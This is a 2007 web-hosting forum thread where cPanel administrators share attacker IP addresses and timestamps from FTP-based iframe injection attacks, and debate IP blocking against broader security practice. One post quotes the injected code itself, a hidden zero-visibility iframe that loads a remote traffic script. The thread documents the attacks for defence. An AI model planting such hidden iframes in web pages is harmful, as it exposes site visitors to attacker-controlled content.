IP addresses from IFrame Hacks
Here is the IP address and approximate times my servers were hit:
84.16.252.163 - sept 30th 12:01:23 - 12:13:46 CST
84.16.252.163 - Oct 2 12:01:46 - 12:05:03 CST (2nd attack)
(this is a sub-posting from thread http://forums.cpanel.net/showthread....d=1#post334464)
Last edited by noimad1; 10-06-2007 at 03:35 AM.
Hi
66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2st Oct
exactly the same here, same time , date & ipOriginally Posted by noimad1
This thread should probably be made stickied... gl to all those looking for an answer.
Interesting...Well that makes me feel a tiny bit better that this might not be a server compromise...
new ip 72.29.95.226 same method as before
81.95.149.75 - October, 2 2007
(client confirmed he used FTP from an infected PC the day before)
Since June, the ones I have caught:
12.130.132.229
132.239.235.55
195.133.109.227
202.151.177.83
203.121.67.164
203.223.159.210
210.188.204.80
211.118.175.22
211.63.65.46
217.118.82.41
217.170.77.210
217.195.87.197
221.201.100.253
24.82.147.206
58.65.235.105
61.183.247.7
69.11.37.86
69.41.162.77
69.50.180.186
71.242.248.228
72.37.179.44
80.81.208.67
81.177.4.34
82.75.59.65
84.164.206.37
Here is my collection.
66.246.218.145 # Sep 09 2007
84.16.252.163 # Aug 29 2007
194.83.36.2 # Aug 30 2007
69.41.162.77 # Sep 27 2007
213.27.26.11 # Sep 27 2007
116.0.103.111 # Oct 9 2007
202.164.52.199 # Oct 9 2007
RVSkin, a great experience for you, resellers and clients!
http://www.RVSkin.com - The Most Intelligent Cpanel Skin, 23 Languages included.
http://www.RVSiteBuilder.com - Website Builder for Hosting Provider.
http://www.cPanelLicense.com - External cPanel License.
66.36.241.185 on 8 servers.
Ronald
Thanks for the information.
Keep it coming.
-Todd Shipway
81.95.150.178 on October 8
<IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>
looks like a one off case as I am still checking the other accounts and logs
Last edited by Imai; 10-13-2007 at 03:24 AM.
81.95.150.82 sept 1st to now
Thanks for the information.
Keep it coming.
I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming, block one another pops up. Block 130 (my max for CSF entries to blocked list) another 130 more blocked next month.
Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already setup on someone else's server continuing to do what they do.
Trying to track down how its happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)
Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.
For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
http://help.joomla.org/component/opt...86/Itemid,268/
That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.
We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.
Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.
cPanel is great stuff, but installing it and using the built in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.
You can block IPs until the cows come home, that's not going to keep you secure.
Anyway, sorry for the rant, just my 2.
you are correct !! I agree with you almost 100% with everything you said in general except one thing. These ftp login defacements or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines. (i think) (or a compromised billing system that stores logins) .At least that is what I have always thought. If that is the case ..then the only way to keep them out is to either block or disable FTP or block the known IP(s) they came in from.
Just keeping my "eye" on things....
R. Paul Mathews
RPMWS - diehard cPanel Nutcase
LinkBack URL
About LinkBacks
Reply With Quote